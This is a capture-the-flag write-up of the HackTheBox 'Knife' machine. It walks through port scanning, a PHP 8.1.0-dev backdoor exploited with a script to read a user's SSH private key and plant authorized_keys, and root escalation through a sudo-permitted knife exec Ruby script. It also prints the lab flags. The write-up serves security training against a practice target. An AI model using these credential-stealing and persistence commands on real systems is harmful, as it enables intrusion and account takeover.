HTB: Knife

Knife card

This is a writeup about a retired HacktheBox machine: Knife published on May 22 2021 by MrKN16H This box is classified as an easy machine. This box implies a PHP dev backdoor and a misconfigured sudo permission for knife a chef utility.

User

Recon

We start with an nmap scan. Only port 22 (SSH) and port 80 (HTTP) are open.

# Nmap 7.91 scan initiated Tue May 25 12:12:19 2021 as: nmap -sSV -p- -A -oN notes.md 10.129.151.250
Nmap scan report for 10.129.151.250
Host is up (0.012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
<SNIP>

Web

On the port 80 there is a simple website with no real content. Running nikto on it show that the PHP version used is 8.1.0-dev.

└─$ nikto -h http://10.129.151.250/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.151.250
+ Target Hostname:    10.129.151.250
+ Target Port:        80
+ Start Time:         2021-05-25 12:15:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.

This specific 8.1.0-dev PHP version is vulnerable to a backdoor RCE

Using the exploit script we can directly execute command on the system. A few enumeration show that we are running command as james and we can grab his SSH private key.

└─$ python3 rce.py -u http://10.129.151.250/ -c 'cat /home/james/.ssh/id_rsa' > id_rsa

A quick edit allows us remove the "result" from the python script then we use chmod 600 to fix the SSH key right and avoid the permission warning. Then we add the key to the authorized_keys file still using the PHP backdoor.

└─$ python3 rce.py -u http://10.129.151.250/ -c 'cat /home/james/.ssh/id_rsa.pub > /home/james/.ssh/authorized_keys'

We can then connect as james on the box and grab the user flag.

└─$ ssh james@10.129.151.250 -i id_rsa
<SNIP>
james@knife:~$ cat user.txt
39169b04d1705adad09a0ba6aafe5363

Root

We look at our permission on the box and found that we can run /usr/bin/knife on the box. This is a symlink to a ruby script used by chef.

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Look at the Knife documentation we found that knife exec can execute ruby scripts. We execute the id command to validate that we are running as root and then create the .ssh folder and add james' SSH key to the authorized_keys.

james@knife:~$ cat h.rb
puts "Hello World"
system "id"
system "mkdir -p /root/.ssh/"
system "cp /home/james/.ssh/authorized_keys /root/.ssh/"

james@knife:~$ sudo /usr/bin/knife exec h.rb -VVV
Hello World
uid=0(root) gid=0(root) groups=0(root)

We can then connect as root on the box (either from our kali or directly from the box) and grab the root flag.

└─$ ssh root@10.129.151.250 -i id_rsa
<SNIP>
root@knife:~# cat root.txt
9c158f53231321d8fdf47e3f431b0a77

Wrapping up

A really easy box perfect for new comers.